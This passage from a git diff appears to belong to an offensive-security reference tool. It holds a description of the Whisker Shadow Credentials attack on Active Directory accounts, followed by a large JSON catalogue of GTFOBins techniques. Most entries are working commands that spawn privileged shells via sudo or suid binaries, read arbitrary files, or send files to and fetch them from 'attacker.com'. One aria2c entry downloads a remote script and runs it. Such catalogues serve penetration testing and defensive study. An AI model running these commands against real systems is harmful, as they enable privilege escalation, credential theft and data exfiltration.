a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "LDAP", + "ADCS" + ], + "references": [ + "https://github.com/eladshamir/Whisker", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" + ], + "added": true + } +] diff --git a/src/data/techniques.json b/src/data/techniques.json @@ -1 +1 @@ -[{"id":"gtfo:7z:file-read:0:sudo","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:7z:file-read:0:unprivileged","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:R:shell:0:sudo","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:suid","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:unprivileged","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:aa-exec:shell:0:sudo","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:suid","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:unprivileged","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:ab:download:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:acr:command:0:sudo","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:suid","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:unprivileged","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:agetty:shell:0:suid","toolId":"gtfo:agetty","toolName":"agetty","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"agetty -l /bin/sh -o -p -a root tty","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/agetty/"]},{"id":"gtfo:alpine:file-read:0:sudo","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:suid","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:unprivileged","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:ansible-playbook:shell:0:sudo","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-playbook:shell:0:unprivileged","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-test:shell:0:sudo","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:ansible-test:shell:0:unprivileged","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:aoss:shell:0:sudo","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:aoss:shell:0:unprivileged","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:apache2:file-read:0:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2ctl:file-read:0:sudo","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apache2ctl:file-read:0:unprivileged","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apport-cli:inherit:0:unprivileged","toolId":"gtfo:apport-cli","toolName":"apport-cli","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apport-cli -f\n1\n2\nv","description":"The terminal interface expects some choices in order to spawn tha pager.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apport-cli/"]},{"id":"gtfo:apt-get:inherit:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:inherit:0:unprivileged","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:aptitude:inherit:0:sudo","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:aptitude:inherit:0:unprivileged","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:ar:file-read:0:sudo","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:suid","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:unprivileged","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:arch-nspawn:shell:0:sudo","toolId":"gtfo:arch-nspawn","toolName":"arch-nspawn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir -p ./etc/\ngrep -oP \"^CHROOT_VERSION='\\K[^']+\" /usr/share/devtools/lib/archroot.sh >.arch-chroot\ntouch ./etc/pacman.conf\necho 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf\narch-nspawn .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"]},{"id":"gtfo:aria2c:command:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:arj:file-read:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arp:file-read:0:sudo","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:suid","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely 